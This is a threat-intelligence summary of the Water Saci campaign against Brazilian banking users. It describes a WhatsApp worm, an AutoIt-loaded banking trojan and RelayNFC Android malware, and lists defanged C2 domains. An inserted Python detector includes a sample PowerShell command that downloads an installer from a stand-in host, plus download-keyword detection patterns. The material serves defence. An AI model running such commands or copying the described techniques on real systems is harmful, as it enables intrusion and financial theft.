The threat actor Water Saci is evolving its tactics, now employing a sophisticated infection chain that uses HTA files and PDFs to propagate a worm. This worm deploys a banking trojan via WhatsApp, targeting users in Brazil.

  • The attackers have shifted from PowerShell to a Python-based variant to spread malware via WhatsApp Web.
  • The new multi-format attack chain uses AI to convert propagation scripts, enabling Water Saci to bypass security controls, exploit user trust, and increase infection rates.
  • Users receive messages on WhatsApp with malicious PDF or HTA attachments, which activate the infection chain and drop a banking trojan.

The infection chain involves:

  1. PDF Lure: Victims are instructed to update Adobe Reader by clicking a link.
  2. HTA Files: Users are tricked into executing a Visual Basic Script, which runs PowerShell commands to fetch payloads from a remote server:
    • An MSI installer for the trojan.
    • A Python script that spreads malware via WhatsApp Web.

Compared with the earlier PowerShell variant, the Python script improves browser compatibility, is written in an object-oriented style, and adds better error handling and automation for malware delivery through WhatsApp Web.

The MSI installer delivers the banking trojan using an AutoIt script, which ensures only one instance of the trojan is running by verifying the existence of an “executed.dat” file. It also notifies a C2 server (“manoelimoveiscaioba[.]com”).

The AutoIt script:

  • Verifies if the Windows system language is set to Portuguese (Brazil).
  • Scans the infected system for banking-related activity, checking for folders related to Brazilian banking applications like Bradesco, Warsaw, Topaz OFD, Sicoob, and Itaú.
  • Analyzes the user’s Google Chrome browsing history for visits to banking websites like Santander, Banco do Brasil, Caixa Econômica Federal, Sicredi, and Bradesco.
  • Checks for installed antivirus and security software, harvesting system metadata.
  • Monitors open windows, extracting window titles to compare against a list of targeted entities (banks, payment platforms, exchanges, crypto wallets).

If relevant windows are found, the script decrypts and injects a TDA file into a hollowed “svchost.exe” process. If only a DMP file is found, it loads the banking trojan directly into the AutoIt process memory.

Persistence is achieved by monitoring the “svchost.exe” process and restarting it if it is terminated.
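From the defender's side, the chain described above (script host launching PowerShell to fetch an MSI and a Python script, and the AutoIt loader starting a hollowed svchost.exe) leaves a distinctive parent/child process trail. The following is an added example, not code from the original report: a small detector run over constructed Sysmon-style process-creation events. The field names, file paths, and sample events are assumptions made for illustration.

```python
import ntpath
import re

# Constructed Sysmon-style process-creation events (assumed field names); not real telemetry.
EVENTS = [
    {"image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmd": r"mshta.exe C:\Users\u\Downloads\AdobeReader_Update.hta"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\mshta.exe",
     "cmd": r"powershell -w hidden -c (New-Object Net.WebClient).DownloadFile('http://example.invalid/s.msi','C:\Users\u\AppData\Local\Temp\s.msi')"},
    {"image": r"C:\Windows\System32\msiexec.exe",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"msiexec /i C:\Users\u\AppData\Local\Temp\s.msi /qn"},
    {"image": r"C:\Windows\System32\svchost.exe",
     "parent": r"C:\Users\u\AppData\Local\Temp\loader.exe",   # hypothetical AutoIt loader
     "cmd": r"svchost.exe"},
    {"image": r"C:\Windows\System32\svchost.exe",
     "parent": r"C:\Windows\System32\services.exe",           # normal svchost parent
     "cmd": r"svchost.exe -k netsvcs"},
]

SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}       # hosts for HTA / VBScript lures
DROPPER_CHILDREN = {"msiexec.exe", "python.exe", "pythonw.exe"}  # payload types named in the report
DOWNLOAD_RE = re.compile(r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|bitsadmin", re.I)

def base(path):
    """Lower-cased file name of a Windows path, usable on any host OS."""
    return ntpath.basename(path).lower()

def detect(events):
    """Return one finding string per suspicious event; benign events produce nothing."""
    findings = []
    for e in events:
        img, parent, cmd = base(e["image"]), base(e["parent"]), e["cmd"]
        if img == "powershell.exe" and parent in SCRIPT_HOSTS:
            tag = " with download command" if DOWNLOAD_RE.search(cmd) else ""
            findings.append(f"{parent} spawned powershell.exe{tag}")
        elif img in DROPPER_CHILDREN and parent == "powershell.exe":
            findings.append(f"powershell.exe spawned {img}")
        elif img == "svchost.exe" and parent != "services.exe":
            # services.exe is the expected parent; anything else is a hollowing candidate (tune per environment)
            findings.append(f"svchost.exe started by {parent} (possible process hollowing)")
    return findings

if __name__ == "__main__":
    for finding in detect(EVENTS):
        print("ALERT:", finding)
```

The three rules are independent, so each one still fires if the chain is only partially observed, for example when the MSI is fetched but the Python spreader is never launched.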

The deployed banking trojan exhibits similarities with Casbaneiro based on:

  • AutoIt-based delivery and loader mechanism.
  • Window title monitoring.
  • Registry-based persistence.
  • IMAP-based fallback command-and-control (C2) mechanism.

Once launched, the trojan:

  • Performs anti-virtualization checks.
  • Gathers host information via WMI queries.
  • Modifies Registry settings for persistence.
  • Communicates with a C2 server (“serverseistemasatu[.]com”) to send details and receive commands.

The trojan’s capabilities include:

  • Sending system information.
  • Enabling keyboard capture.
  • Starting/stopping screen capture.
  • Modifying screen resolution.
  • Simulating mouse movements and clicks.
  • Performing file operations (upload/download).
  • Enumerating windows.
  • Creating fake banking overlays to capture credentials.

The campaign uses a Python script to deliver malware via WhatsApp Web sessions using Selenium. There is evidence suggesting that Water Saci used LLMs or code-translation tools to port the script from PowerShell to Python.

In addition, Brazilian banking users are being targeted by RelayNFC Android malware, which performs NFC relay attacks to steal contactless payment data.

  • RelayNFC implements a full real-time APDU relay channel.
  • The malware is built using React Native and Hermes bytecode.
  • It spreads via phishing, using decoy Portuguese-language sites.
  • The goal is to capture card details and relay them to attackers for fraudulent transactions.
  • It operates by instructing the victim to tap their payment card on the device, then prompts for the PIN.
  • The captured information is sent to the attacker’s server via WebSocket.
  • The malware also implements Host Card Emulation (HCE), allowing card interactions to be transmitted between a terminal and an attacker-controlled device.

Conclusion

The Water Saci campaign highlights a new era of cyber threats in Brazil, where attackers weaponize messaging platforms like WhatsApp to orchestrate large-scale, self-propagating malware campaigns. They use social engineering to compromise victims and sustain banking trojan infections, demonstrating the growing sophistication of cybercriminal operations in the region. The emergence of RelayNFC Android malware further underscores the evolving threat landscape targeting payment systems in Brazil.

References

  • C2 server: manoelimoveiscaioba[.]com
  • C2 server: serverseistemasatu[.]com
  • Phishing site (RelayNFC): maisseguraca[.]site
  • Phishing site (RelayNFC): test.ikotech[.]online